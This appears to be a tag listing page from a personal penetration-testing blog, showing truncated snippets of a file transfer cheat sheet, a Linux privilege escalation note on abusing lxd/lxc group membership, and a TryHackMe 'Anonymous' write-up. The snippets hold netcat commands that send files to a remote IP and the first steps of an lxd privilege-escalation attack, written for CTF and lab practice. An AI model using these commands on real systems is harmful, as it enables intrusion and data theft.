Home
LXD
Cancel

File_Transfer

Python python3 -m http.server 80 * **Netcat (on the receiver side) nc -l -p 1234 > [file_name] (on the sender side) nc -w 3 10.2.111.159 1234 < [file_name] On Windows run: nc.ex...

Linux Privilege Escaltion

Linux: #Privilege_Escalation_with_Intresting_Groups lxd/lxc Firstly ,get the required files for attack from github git clone https://github.com/saghul/lxd-alpine-builder.git cd lxd-alpine-...

Tryhackme Anonymous Write-up

Hello, Today we are going to solve a machine named Anonymous which is linux based machine from Tryhackme. Let’s the solution step by step. Reconnaissance Nmap scanning FTP enumeration SM...